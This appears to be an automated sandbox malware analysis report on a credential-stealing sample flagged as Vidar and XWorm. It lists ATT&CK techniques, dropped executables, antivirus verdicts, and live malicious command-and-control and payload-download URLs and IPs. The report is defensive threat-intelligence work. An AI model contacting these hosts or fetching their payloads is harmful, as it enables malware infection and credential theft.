Source: Yara match	File source: 0000001D.00000002.2480751384.00000000015EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1852024640.0000000000FC1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0fb4fa91ba.exe PID: 6060, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 6564, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 27.2.qk4EiZw.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000003.2205328066.0000000005030000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2518875337.0000000005395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2503940481.00000000001C2000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: qk4EiZw.exe PID: 7600, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF50C40 sqlite3_bind_zeroblob,	0_2_6CF50C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF50D60 sqlite3_bind_parameter_name,	0_2_6CF50D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE78EA0 sqlite3_clear_bindings,	0_2_6CE78EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF50B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6CF50B40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE76410 bind,WSAGetLastError,	0_2_6CE76410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE760B0 listen,WSAGetLastError,	0_2_6CE760B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE76070 PR_Listen,	0_2_6CE76070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE7C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	0_2_6CE7C050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE7C030 sqlite3_bind_parameter_count,	0_2_6CE7C030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE022D0 sqlite3_bind_blob,	0_2_6CE022D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE763C0 PR_Bind,	0_2_6CE763C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE794F0 sqlite3_bind_text16,	0_2_6CE794F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE794C0 sqlite3_bind_text,	0_2_6CE794C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE79480 sqlite3_bind_null,	0_2_6CE79480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE79400 sqlite3_bind_int64,	0_2_6CE79400

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Scheduled Task/Job	12 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	12 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	121 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	248 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	121 Registry Run Keys / Startup Folder	12 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	871 Security Software Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	114 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	361 Virtualization/Sandbox Evasion	DCSync	361 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	50%	Virustotal		Browse
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\qk4EiZw[1].exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe	100%	Avira	TR/ATRAPS.Gen
C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\qk4EiZw[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\qk4EiZw[1].exe	29%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe	47%	ReversingLabs	Win32.Trojan.Symmi
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe	24%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[1].exe	45%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	29%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	47%	ReversingLabs	Win32.Trojan.Symmi
C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	45%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\1012944001\e0da62c8af.exe	24%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label	Link
http://185.215.113.206/68b591d6548ec281/mozglue.dllL	100%	Avira URL Cloud	malware
http://31.41.244.11/files/7299809293/qk4EiZw.exeXYZ0123456789	100%	Avira URL Cloud	malware
https://atten-supporse.biz/&	100%	Avira URL Cloud	malware
112.213.116.149	0%	Avira URL Cloud	safe
http://31.41.244.11/files/7299809293/qk4EiZw.exe	100%	Avira URL Cloud	malware
http://185.215.113.2069365c8833f063ca53d79d3b404e416815d450862636a9c8fb29yZSBPbGR8MXxcQml0Y29pblx8Kn	0%	Avira URL Cloud	safe
http://185.215.113.206/68b591d6548ec281/nss3.dllf	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpcg	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.php1e	100%	Avira URL Cloud	malware
http://185.215.113.16/well/random.exeQ	0%	Avira URL Cloud	safe
http://31.41.244.11/files/7299809293/qk4EiZw.exeshqos.dll)U	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpBS;.VBE;.JS;.JSE;.	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/msvcp140.dllD	100%	Avira URL Cloud	malware
http://185.215.113.206PBMpw	0%	Avira URL Cloud	safe
http://185.215.113.16/well/random.exec613	0%	Avira URL Cloud	safe
http://185.215.113.16/well/random.exeo	0%	Avira URL Cloud	safe
http://185.215.113.206/68b591d6548ec281/softokn3.dllb	100%	Avira URL Cloud	malware
http://185.215.113.16/well/random.exe450;	0%	Avira URL Cloud	safe
https://atten-supporse.biz/apiA6	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpy5	100%	Avira URL Cloud	malware
http://185.215.113.16/steam/random.exeD	0%	Avira URL Cloud	safe
http://31.41.244.11/files/7299809293/qk4EiZw.exe	18%	Virustotal		Browse
http://185.215.113.206/68b591d6548ec281/sqlite3.dllb	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/softokn3.dllS	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.php&_	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.php/8	100%	Avira URL Cloud	malware
https://atten-supporse.biz/api)	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
atten-supporse.biz	104.21.16.9	true	false	high
www3.l.google.com	172.217.17.78	true	false	high
plus.l.google.com	172.217.17.46	true	false	high
www.google.com	142.250.181.68	true	false	high
ogs.google.com	unknown	unknown	false	high
apis.google.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.206/68b591d6548ec281/softokn3.dll	false		high
dare-curbys.biz	false		high
http://185.215.113.206/	false		high
http://185.215.113.43/Zu7JuNko/index.php	false		high
http://185.215.113.206/68b591d6548ec281/freebl3.dll	false		high
112.213.116.149	true	Avira URL Cloud: safe	unknown
formy-spill.biz	false		high
http://185.215.113.206/68b591d6548ec281/nss3.dll	false		high
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false		high
https://atten-supporse.biz/api	false		high
atten-supporse.biz	false		high
print-vexer.biz	false		high
http://185.215.113.206/68b591d6548ec281/vcruntime140.dll	false		high
impend-differ.biz	false		high
http://185.215.113.16/mine/random.exe	false		high
http://185.215.113.206/68b591d6548ec281/sqlite3.dll	false		high
dwell-exclaim.biz	false		high
zinc-sneark.biz	false		high
http://185.215.113.206/68b591d6548ec281/mozglue.dll	false		high
se-blurry.biz	false		high
covery-mover.biz	false		high
http://185.215.113.206/68b591d6548ec281/msvcp140.dll	false		high
http://185.215.113.206/c4becf79229cb002.php	false		high
https://www.google.com/async/newtab_promos	false		high
https://www.google.com/async/ddljson?async=ntp:2	false		high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0	file.exe, 00000000.00000002.1898846164.000000002381C000.00000004.00000020.00020000.00000000.sdmp, JDHCBAEHJJJKKFIDGHJE.0.dr	false		high
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.1454505396.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, EBAKFIIJ.0.dr	false		high
http://185.215.113.206/68b591d6548ec281/mozglue.dllL	file.exe, 00000000.00000002.1867859972.0000000001677000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.1454505396.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, EBAKFIIJ.0.dr	false		high
http://www.broofa.com	chromecache_98.12.dr	false		high
http://31.41.244.11/files/7299809293/qk4EiZw.exeXYZ0123456789	skotes.exe, 00000019.00000002.2513354623.000000000107E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/ws	0fb4fa91ba.exe, 0000001D.00000002.2480751384.0000000001627000.00000004.00000020.00020000.00000000.sdmp	false		high
http://31.41.244.11/files/7299809293/qk4EiZw.exe	skotes.exe, 00000019.00000002.2513354623.000000000107E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000019.00000002.2513354623.000000000102B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000019.00000002.2513354623.000000000109B000.00000004.00000020.00020000.00000000.sdmp	false	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.google.com	chromecache_98.12.dr	false		high
https://atten-supporse.biz/&	9faf801df7.exe, 0000001C.00000003.2342216529.0000000000FDD000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000003.2342540131.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000002.2343911832.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.phpation	file.exe, 00000000.00000002.1852024640.0000000001044000.00000040.00000001.01000000.00000003.sdmp	false		high
http://185.215.113.2069365c8833f063ca53d79d3b404e416815d450862636a9c8fb29yZSBPbGR8MXxcQml0Y29pblx8Kn	file.exe, 00000000.00000002.1852024640.0000000001044000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	qk4EiZw.exe, 0000001B.00000002.2518875337.0000000005351000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK	BKJKJEHJJDAKECBFCGIDBGCAEG.0.dr	false		high
http://185.215.113.16/well/random.exe	skotes.exe, 00000019.00000002.2513354623.000000000109B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.mozilla.com/en-US/blocklist/	file.exe, file.exe, 00000000.00000002.1903696304.000000007013D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false		high
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false		high
http://185.215.113.206/68b591d6548ec281/nss3.dllf	file.exe, 00000000.00000002.1867859972.0000000001677000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.phpcg	0fb4fa91ba.exe, 0000001D.00000002.2480751384.000000000163F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.1454505396.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, EBAKFIIJ.0.dr	false		high
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.1454505396.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, EBAKFIIJ.0.dr	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	BKJKJEHJJDAKECBFCGIDBGCAEG.0.dr	false		high
http://185.215.113.206/c4becf79229cb002.php1e	file.exe, 00000000.00000002.1898846164.0000000023834000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://play.google.com/log?format=json&hasfast=true	chromecache_98.12.dr	false		high
http://crl.micro	9faf801df7.exe, 0000001C.00000003.2342500104.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000003.2342216529.0000000000F71000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/well/random.exeQ	skotes.exe, 00000019.00000002.2513354623.000000000109B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	file.exe, 00000000.00000002.1898846164.000000002381C000.00000004.00000020.00020000.00000000.sdmp, JDHCBAEHJJJKKFIDGHJE.0.dr	false		high
http://31.41.244.11/files/7299809293/qk4EiZw.exeshqos.dll)U	skotes.exe, 00000019.00000002.2513354623.000000000102B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.phpP	file.exe, 00000000.00000002.1898846164.0000000023828000.00000004.00000020.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/	9faf801df7.exe, 0000001C.00000003.2342216529.0000000000FDD000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000002.2343522276.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000003.2342540131.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000002.2343911832.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 00000020.00000002.2509607075.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 00000020.00000002.2509607075.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.phpBS;.VBE;.JS;.JSE;.	file.exe, 00000000.00000002.1898846164.0000000023834000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/68b591d6548ec281/msvcp140.dllD	file.exe, 00000000.00000002.1867859972.000000000165A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206PBMpw	0fb4fa91ba.exe, 0000001D.00000002.2480751384.00000000015CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.206/c4becf79229cb002.phpd	file.exe, 00000000.00000002.1867859972.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/well/random.exec613	skotes.exe, 00000019.00000002.2513354623.000000000109B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/well/random.exeo	skotes.exe, 00000019.00000002.2513354623.000000000109B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.43/Zu7JuNko/index.phpb	skotes.exe, 00000019.00000002.2513354623.0000000001085000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpF	skotes.exe, 00000019.00000002.2513354623.0000000001085000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.1454505396.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, EBAKFIIJ.0.dr	false		high
http://185.215.113.206/c4becf79229cb002.phpn	0fb4fa91ba.exe, 0000001D.00000002.2480751384.00000000015EC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/luma/random.exe	skotes.exe, 00000019.00000002.2513354623.000000000109B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.phpx	file.exe, 00000000.00000002.1898846164.0000000023828000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/68b591d6548ec281/softokn3.dllb	file.exe, 00000000.00000002.1867859972.000000000165A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.1454505396.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, EBAKFIIJ.0.dr	false		high
http://185.215.113.206/T	file.exe, 00000000.00000002.1867859972.000000000165A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/well/random.exe450;	skotes.exe, 00000019.00000002.2513354623.000000000109B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://apis.google.com	chromecache_98.12.dr	false		high
http://185.215.113.206/c4becf79229cb002.phpdge	file.exe, 00000000.00000002.1852024640.0000000001044000.00000040.00000001.01000000.00000003.sdmp	false		high
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.1903162127.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1896450432.000000001D7EE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/apiA6	9faf801df7.exe, 0000001C.00000003.2342620516.0000000000F7B000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000002.2343796739.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000003.2342216529.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000003.2342563019.0000000000F73000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.phpy5	file.exe, 00000000.00000002.1898846164.0000000023834000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.1454505396.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, EBAKFIIJ.0.dr	false		high
http://185.215.113.16/steam/random.exeD	skotes.exe, 00000019.00000002.2513354623.000000000109B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/steam/random.exe	skotes.exe, 00000019.00000002.2513354623.000000000109B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.	file.exe, 00000000.00000002.1898846164.000000002381C000.00000004.00000020.00020000.00000000.sdmp, JDHCBAEHJJJKKFIDGHJE.0.dr	false		high
http://185.215.113.206/68b591d6548ec281/sqlite3.dllb	file.exe, 00000000.00000002.1867859972.0000000001677000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/68b591d6548ec281/softokn3.dllS	file.exe, 00000000.00000002.1867859972.000000000165A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206ata	file.exe, 00000000.00000002.1852024640.0000000001044000.00000040.00000001.01000000.00000003.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.1454505396.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, EBAKFIIJ.0.dr	false		high
http://185.215.113.206/c4becf79229cb002.php&_	file.exe, 00000000.00000002.1898846164.0000000023834000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.phpd2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8K	file.exe, 00000000.00000002.1852024640.0000000001044000.00000040.00000001.01000000.00000003.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.1898846164.000000002381C000.00000004.00000020.00020000.00000000.sdmp, JDHCBAEHJJJKKFIDGHJE.0.dr	false		high
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u	file.exe, 00000000.00000002.1898846164.000000002381C000.00000004.00000020.00020000.00000000.sdmp, JDHCBAEHJJJKKFIDGHJE.0.dr	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e	JDHCBAEHJJJKKFIDGHJE.0.dr	false		high
http://185.215.113.206/c4becf79229cb002.php/8	0fb4fa91ba.exe, 0000001D.00000002.2480751384.0000000001627000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://atten-supporse.biz:443/api	9faf801df7.exe, 00000020.00000002.2509607075.0000000000F68000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org	BKJKJEHJJDAKECBFCGIDBGCAEG.0.dr	false		high
http://185.215.113.206	file.exe, 00000000.00000002.1867859972.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1852024640.0000000001044000.00000040.00000001.01000000.00000003.sdmp, 0fb4fa91ba.exe, 0000001D.00000002.2480751384.00000000015CE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.1454505396.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, EBAKFIIJ.0.dr	false		high
https://atten-supporse.biz/api)	9faf801df7.exe, 00000020.00000002.2509607075.0000000000F68000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta	file.exe, 00000000.00000002.1898846164.000000002381C000.00000004.00000020.00020000.00000000.sdmp, JDHCBAEHJJJKKFIDGHJE.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
172.217.17.46	plus.l.google.com	United States	15169	GOOGLEUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
112.213.116.149	unknown	Hong Kong	38197	SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
142.250.181.68	www.google.com	United States	15169	GOOGLEUS	false
104.21.16.9	atten-supporse.biz	United States	13335	CLOUDFLARENETUS	false
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false

Private

IP
192.168.2.7
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1570613
Start date and time:	2024-12-07 12:58:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	33
Number of new started drivers analysed:	0
